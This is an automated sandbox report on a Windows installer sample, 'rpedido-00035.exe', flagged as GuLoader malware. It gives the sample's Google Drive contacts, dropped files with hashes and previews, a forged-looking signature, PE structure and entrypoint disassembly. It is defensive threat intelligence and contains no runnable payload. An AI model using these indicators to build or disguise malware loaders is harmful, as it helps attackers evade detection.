                        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdrpedido-00035.exe, 00000002.00000001.44421584161.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                          		unknown
                          https://apis.google.comrpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://nsis.sf.net/NSIS_ErrorErrorrpedido-00035.exe, 00000000.00000000.43566865335.000000000040A000.00000008.00000001.01000000.00000003.sdmp, rpedido-00035.exe, 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp, rpedido-00035.exe, 00000002.00000000.44420461178.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                              		unknown
                              https://drive.gomrpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://drive.google.com/xrpedido-00035.exe, 00000002.00000002.44880946396.0000000005BF5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://ocsp.quovadisoffshore.com0rpedido-00035.exe, 00000002.00000003.44817200675.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523778965.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44557524307.0000000005C3E000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44783022070.0000000005C37000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44782866812.0000000005C3B000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000003.44523532832.0000000005C3E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://drive.google.com/rpedido-00035.exe, 00000002.00000003.44817366771.0000000005BEB000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BF5000.00000004.00000020.00020000.00000000.sdmp, rpedido-00035.exe, 00000002.00000002.44880946396.0000000005BEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      142.250.65.206
                                      		drive.google.comUnited States
                                      		15169GOOGLEUSfalse
                                      142.250.65.161
                                      		drive.usercontent.google.comUnited States
                                      		15169GOOGLEUSfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1526071
                                      Start date and time:2024-10-04 17:21:31 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 17m 41s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                      Run name:Suspected Instruction Hammering
                                      Number of analysed new started processes analysed:4
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:2
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:rpedido-00035.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@5/8@2/2
                                      EGA Information:
                                      • Successful, ratio: 75%
                                      HCA Information:
                                      • Successful, ratio: 88%
                                      • Number of executed functions: 72
                                      • Number of non-executed functions: 294
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtEnumerateKey calls found.
                                      • Report size getting too big, too many NtOpenKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: rpedido-00035.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      11:26:25API Interceptor11101089x Sleep call for process: sethc.exe modified
                                      11:28:49API Interceptor170x Sleep call for process: explorer.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASNs

                                      No context

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      37f463bf4616ecd445d4a1937da06e19w2TxCv1zA8.msiGet hashmaliciousUnknownBrowse
                                      • 142.250.65.206
                                      • 142.250.65.161
                                      RNKJUiDSbh.dllGet hashmaliciousUnknownBrowse
                                      • 142.250.65.206
                                      • 142.250.65.161
                                      RNKJUiDSbh.dllGet hashmaliciousUnknownBrowse
                                      • 142.250.65.206
                                      • 142.250.65.161
                                      Setup.exeGet hashmaliciousUnknownBrowse
                                      • 142.250.65.206
                                      • 142.250.65.161
                                      App_installer32_64x.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                      • 142.250.65.206
                                      • 142.250.65.161
                                      setup_run.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                      • 142.250.65.206
                                      • 142.250.65.161
                                      presupuesto urgente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 142.250.65.206
                                      • 142.250.65.161
                                      -pdf.bat.exeGet hashmaliciousGuLoaderBrowse
                                      • 142.250.65.206
                                      • 142.250.65.161
                                      PEDIDO-144797.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 142.250.65.206
                                      • 142.250.65.161
                                      -pdf.bat.exeGet hashmaliciousFormBookBrowse
                                      • 142.250.65.206
                                      • 142.250.65.161

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dllpresupuesto urgente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                        presupuesto urgente.exeGet hashmaliciousGuLoaderBrowse
                                          PEDIDO-144797.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            PEDIDO-144797.exeGet hashmaliciousGuLoaderBrowse
                                              rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                rpedido-002297.exeGet hashmaliciousGuLoaderBrowse
                                                  FACTURA-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    FACTURA-002297.exeGet hashmaliciousGuLoaderBrowse
                                                      LisectAVT_2403002A_41.exeGet hashmaliciousGuLoaderBrowse

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\nsnE6FB.tmp\System.dll

                                                        Download File
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11776
                                                        Entropy (8bit):5.659384359264642
                                                        Encrypted:false
                                                        SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                        MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                        SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                        SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                        SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: presupuesto urgente.exe, Detection: malicious, Browse
                                                        • Filename: presupuesto urgente.exe, Detection: malicious, Browse
                                                        • Filename: PEDIDO-144797.exe, Detection: malicious, Browse
                                                        • Filename: PEDIDO-144797.exe, Detection: malicious, Browse
                                                        • Filename: rpedido-002297.exe, Detection: malicious, Browse
                                                        • Filename: rpedido-002297.exe, Detection: malicious, Browse
                                                        • Filename: FACTURA-002297.exe, Detection: malicious, Browse
                                                        • Filename: FACTURA-002297.exe, Detection: malicious, Browse
                                                        • Filename: LisectAVT_2403002A_41.exe, Detection: malicious, Browse
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Local\Temp\nszDD94.tmp

                                                        Download File
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):1359453
                                                        Entropy (8bit):3.8940291804171405
                                                        Encrypted:false
                                                        SSDEEP:12288:uILcPC3smMtXml/a2X5dkLuW9C234VOHubkTNnlXE9YDU0A0K:uILcPC3smMtXmlpAbDUrR
                                                        MD5:D4577FDFDEDA8D46C88C6B0EE3961B20
                                                        SHA1:379039559EAEA6BB71017B8D3E51E7C174F69894
                                                        SHA-256:29120770F9AB1B2E8EA2320318CB0179130D562F2219CA16B7878C7039B3110A
                                                        SHA-512:D836B495B3D7673C17C47ECFB6C73694EE71D0A9FDB05629ABAACB0FF70C8A2C25AA9733B4E252BC3B0CD5594F7DD77AD90669FAF90881235391CD75604E6C64
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nszDD94.tmp, Author: Joe Security
                                                        Reputation:low
                                                        Preview:.8......,.......................().......7.......8..........................................................................................................................................................................................................................................G...J...........Y...j...............................................................................................................................U...............(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\Meningorrhoea.Tig

                                                        Download File
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):215183
                                                        Entropy (8bit):7.5201840696098134
                                                        Encrypted:false
                                                        SSDEEP:6144:CHPILcPC3smMtXml/P0v7GrhxM45dgawi3:WILcPC3smMtXml/a2X5dz
                                                        MD5:64599F4C9B26D42A20635DE637BA2F84
                                                        SHA1:2A83C417994B8D0B89B5C67A63D3983ABB93DC68
                                                        SHA-256:9E7102468B7DBAEEBDFBA02CF2C17C5CB93E03640CF9F807922ACB5ECBED7F0A
                                                        SHA-512:908AC8521DD9BDE63E9FD2DBEC00B5F16EC5F92AD23507DB01986F2A0B676E3DE78AD43DBB00BB4803DD48436E25DB2343529FC61065C44F53B799A0815B188E
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\Meningorrhoea.Tig, Author: Joe Security
                                                        Reputation:low
                                                        Preview:..*.9................}....!!...... .111..r...................................................e...bbbb..@.....CC..E........................yyyy...F........v...?.................+... ..........4.......k....h........................jj...{...d...<<...a.....FFF.:.{.....wwwww.....cccc.ggg......W.....Z.........J..c........M.p.//////////.EEE.....m...................OO.........................%%%%._....<...ZZZ..s............66....................(........................$..J..v.I..................r...................C.................\............=.......n...........55....((...B...........ff.w...R............***..{{{{.i........II.'.<<.........}..........rrr......[[[...xx.............5.9.....>>........................................H..ff...........bbb.......[.................O.@@..........NNN.;;..((....S......................))...............K...Z...h................................ll.H.........G...qq.........C.0....h..........}..ii.g.''.}}.............8.................YY................&&&.

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\bushers.txt

                                                        Download File
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):523
                                                        Entropy (8bit):4.30492942039079
                                                        Encrypted:false
                                                        SSDEEP:12:nGy3qcf5opzE6vCdgLMc/Uqv7FE7KRbqYUH6uN0u8vM:GEpxoy6adY/UqvZEwbql6uNh
                                                        MD5:B33890A43FB0F38B6DDF18C5BCEFE234
                                                        SHA1:80ED178A92C2B5CB530AEE4673FFC9011EBF86BB
                                                        SHA-256:3BF02F982A76A4C896FDA78C1C4B2B730D690DD86475213DC415269D4629407B
                                                        SHA-512:169E2D067337BF05BA08D615CE61B28CA4FD93D204966B3386FB4B373D9BACD689BEE3DDC5E04A4F19586E585263F62BC40B0944A10E5867C63C9C7236A5CC48
                                                        Malicious:false
                                                        Preview:clisiocampa percussing acronyctous petitesses pilgrimsrejser zygosphene miasmology konkyljens..labelable kraftls veneries symbolically duncan sulemadens,logopdisk genuinenesses pseudoinspirational bekenderen.franciscanism krftcellers drylots toksikologiskes rottegiftes impecuniary slisken autokratiets hjertebaandet banegaardsbygningen choenix..adrenocorticotropic mangfoldigheders avisudvikling ekstremitetens skamsloges nrede unpersuasion trachling tvrformatets..negerbolle suppressionen lustful bagels flamenco selrets,

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins\Xerografrgr.Pro

                                                        Download File
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):442708
                                                        Entropy (8bit):2.64997516010117
                                                        Encrypted:false
                                                        SSDEEP:1536:k+opYDPkSLujsNOSxsICKcDf7rF4kf9T10JGoihUm5ii/m6gzxyqmxwrWVp/l4g5:ML/mKR9C2me4VOHubkhZj57zlXE9U
                                                        MD5:4AC6472543F65AF4937D690A8AE94380
                                                        SHA1:7BBA85F6A832D3B30726C5D9E3A30660C356C864
                                                        SHA-256:4BCF201D6466DE01A88D56430E774F1EF79F4D020775FFE5E990DC0DE170E242
                                                        SHA-512:FA2CF8156087AA0915C7D5B314ED184C4456266C55EAE1C3CB2563FB6A6D5E1D1A469DE33FBEA226C76DF4439D6DB729C2042366B11788613D17C1228515370F
                                                        Malicious:false
                                                        Preview:0000000000004700000000430000FDFD00A00000570000C0C0C00000000000007B7B0000FBFBFB0000000000000000AD0000005900A600000A004800D300000000090000BB000000005A00E4E400B0B0007272008989890068680000008F0000007A7A00003500000000000000000000000000FB000000000020200000006700000086868600009595959500EE0000C9C9C9C9000E0E0E0E0061616100006C6C0000001A1A1A000000002400005B00242400000000007700000002020000002A2A2A0000E0004000000000C5C5000043000000000000BABA0000000033004E4E4E4E4E009E9E00150000B7B7B70000000004040000000000F800B9B9B9006A000000008A8A00000000810000818181818100D200000000480000F10000009D003C3C3C0000009300005F5F5F00008585850000ACAC0000005B5B00000038000000B8B8B8000098989800000F0F0F0000C10000002E2E2E2E2E2E0000000000C300EE0000000000005555550000A8000098009B9B9B9B008B8B8B8B00C9C9000000A7A7A7A7A7A7A700003600000000FFFFFFFF00000000A3007171710000C4000000000000250000BCBCBCBC00000026001111110000B2B200005700009E9E9E9E9E000000640000FBFBFB00B6007A7A000000C4000000E9E9E9007E0000008484006161002B2B2B2B000000006A0000EF000000

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins\meropidae.kej

                                                        Download File
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):276551
                                                        Entropy (8bit):1.2459972317120458
                                                        Encrypted:false
                                                        SSDEEP:768:q5eLWls2nEEvz9mAEPesDf7zRhfRKrtTgtOnumyYJBW+JAILJcqhOzwnasNP2r2J:q86nLDJnJuki2BaFsfRz
                                                        MD5:0071DC51C79F0655F0BB77074D56B1D7
                                                        SHA1:9617AE1434B07532BAAF39D69CF720C05B85E8F9
                                                        SHA-256:0628FA8F44795D79D5B855E8387985E04D134E8B57FE4D57E663FBAED278DF89
                                                        SHA-512:E2149E9F3B18DCB50E49EC51226D7A6BF3969E119B385410E80E431024B25A938C965C743D80C0C1D8A3820D0DDDA14464CAC75F73AE22F259B447264F8431BA
                                                        Malicious:false
                                                        Preview:........................................................#..................................................................................E........R...............................]......................W...\......O.........................................$9......4.............................;..........X........................Z........"..............................................................................;..........U.....................^.....................l.......................3...................~............u.........................................e......P..................................H..............................................................................2.........2.................>....................................................................................................................+.......z....................A..$.........................................................................................]........?..............................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins\plastron.ori

                                                        Download File
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):398154
                                                        Entropy (8bit):1.2543435533086644
                                                        Encrypted:false
                                                        SSDEEP:1536:8IfJmHKeJzuGrd0myk0Ek5rFnJd62xZ9WEmaslkcO:8omHKAJR0T8axr
                                                        MD5:7BA8E260D6477B4FD16DAE2D14EA4482
                                                        SHA1:16873CB5BFBA899D4ED937603AA9980F119695D6
                                                        SHA-256:C19F7B3F1A20E1529113EE69AA53DB6E124A51F03098E6FB6AF0E76037C85B8B
                                                        SHA-512:ECAA786515C73B08A44C22FD48B205166611750EC633849823A88BBF95A675CA29FB7F22E652EFCFC055FC92F8381FC6276F4B732F91612A2385BF670131FFF2
                                                        Malicious:false
                                                        Preview:...................z...................................................1........................................T.......r...........................'......................O..................|......P.................................0.....................................).......................l.............S..^......Z.........E.................................{.....................................................................................................................................................................$...........*................................................D........y....................................0..........|........m............................G.............Q...........>...s.......C...................................................".....................................................................+.......................L...6.......................................................................`.................................k.....................

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Gaulin.ini

                                                        Download File
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.046762824854522
                                                        Encrypted:false
                                                        SSDEEP:3:lgov8fOMy:XHB
                                                        MD5:CFDA8E6AADE7958F94A959BDB29CB209
                                                        SHA1:59C459E105A7AF33D13A365F735E3CB7B8E5DDB0
                                                        SHA-256:B4543E8AB4997934D2EDC7DE8A76A24B7C2CCB641212AE3B9B17FE05B71D3E87
                                                        SHA-512:EDFDCA00667ED3A5558F7E614373F0B8393763A979154666972C659CB44E75CCD51170E4E2189043046EB4DDB8A68642BBDB6F98A0E494E76E86FAAF14F993B2
                                                        Malicious:false
                                                        Preview:[xanthippe]..sikkerhedsgraden=preve..

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.236355275676429
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:rpedido-00035.exe
                                                        File size:577'872 bytes
                                                        MD5:13de5fefd3dda5e310cde2fa1e6d4b32
                                                        SHA1:3e54744b089154a3a90ebe930ae8af45879e88a9
                                                        SHA256:7861c46cbb414dbcc6aa51977b94c3532391afa08aaa9907f865e51eb95422b0
                                                        SHA512:ca134f82edc5159d1fb8da61c3bb770d61575ca40229b8ad533900ef98a3d9fbac6fe77ee0d27d87cbbaa2d3c21a7079905286b8c5cad3c022a4a52ce1221ed8
                                                        SSDEEP:12288:TaxXT1s1I7qUEIfakQx8vDkLIuiVS5W57/0fA:WJJAetE5xC2fiVSGcfA
                                                        TLSH:2EC4EF9B6EE2C9DEC8134934A9E5B2B1B5F2ACF057536D0327733AED2C31D118E06259
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.....

                                                        File Icon

                                                        Icon Hash:5ce633391c1c0601

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x403489
                                                        Entrypoint Section:.text
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x5975952E [Mon Jul 24 06:35:26 2017 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9

                                                        Authenticode Signature

                                                        Signature Valid:false
                                                        Signature Issuer:CN="Carburetest Realkreditlaan ", E=Outsiderens@Wronger.Fra, L=Abb\xe9villers, S=Bourgogne-Franche-Comt\xe9, C=FR
                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                        Error Number:-2146762487
                                                        Not Before, Not After
                                                        • 16/01/2024 08:39:54 15/01/2027 08:39:54
                                                        Subject Chain
                                                        • CN="Carburetest Realkreditlaan ", E=Outsiderens@Wronger.Fra, L=Abb\xe9villers, S=Bourgogne-Franche-Comt\xe9, C=FR
                                                        Version:3
                                                        Thumbprint MD5:3B7D88BB19B4D12F392DE615D1872B54
                                                        Thumbprint SHA-1:268D897555CCC4D793C934690FB5F6A6A651A609
                                                        Thumbprint SHA-256:AD760A30FF015FDA84739B200BF7A7BFA27F3A38D43AC5E17655C58AAE28323D
                                                        Serial:5986F0CD36416D42BBC239B65F6809C71E75AB62

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 000002D4h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        pop edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+14h], ebx
                                                        mov dword ptr [esp+10h], 0040A230h
                                                        mov dword ptr [esp+1Ch], ebx
                                                        call dword ptr [004080ACh]
                                                        call dword ptr [004080A8h]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [0042A24Ch], eax
                                                        je 00007F13F49DA503h
                                                        push ebx
                                                        call 00007F13F49DD7B1h
                                                        cmp eax, ebx
                                                        je 00007F13F49DA4F9h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082B0h
                                                        push esi
                                                        call 00007F13F49DD72Bh
                                                        push esi
                                                        call dword ptr [00408150h]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], 00000000h
                                                        jne 00007F13F49DA4DCh
                                                        push 0000000Ah
                                                        call 00007F13F49DD784h
                                                        push 00000008h
                                                        call 00007F13F49DD77Dh
                                                        push 00000006h
                                                        mov dword ptr [0042A244h], eax
                                                        call 00007F13F49DD771h
                                                        cmp eax, ebx
                                                        je 00007F13F49DA501h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007F13F49DA4F9h
                                                        or byte ptr [0042A24Fh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408044h]
                                                        push ebx
                                                        call dword ptr [004082A0h]
                                                        mov dword ptr [0042A318h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+34h]
                                                        push 000002B4h
                                                        push eax
                                                        push ebx
                                                        push 004216E8h
                                                        call dword ptr [00408188h]
                                                        push 0040A384h

                                                        Rich Headers

                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x220b8.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x8bd880x13c8
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x63d10x6400139645791b76bd6f7b8c4472edbbdfe5False0.66515625data6.479451209065IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x80000x138e0x1400007eff248f0493620a3fd3f7cadc755bFalse0.45data5.143831732151552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xa0000x203580x600ec5bcec782f43a3fb7e8dfbe0d0db4dbFalse0.501953125data4.000739070159718IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x2b0000x2c0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x570000x220b80x2220030cc4d5ad2d805f600d8d9358a38829aFalse0.1827066163003663data2.9689436080399076IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x572c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.14975452502070272
                                                        RT_ICON0x67af00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.18344019339920117
                                                        RT_ICON0x70f980x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.21953235710911667
                                                        RT_ICON0x751c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.2731327800829875
                                                        RT_ICON0x777680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.3428705440900563
                                                        RT_DIALOG0x788100x120dataEnglishUnited States0.5138888888888888
                                                        RT_DIALOG0x789300x11cdataEnglishUnited States0.6056338028169014
                                                        RT_DIALOG0x78a500xc4dataEnglishUnited States0.5918367346938775
                                                        RT_DIALOG0x78b180x60dataEnglishUnited States0.7291666666666666
                                                        RT_GROUP_ICON0x78b780x4cdataEnglishUnited States0.8026315789473685
                                                        RT_VERSION0x78bc80x1b0dataEnglishUnited States0.5601851851851852
                                                        RT_MANIFEST0x78d780x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                        Imports

                                                        DLLImport
                                                        KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
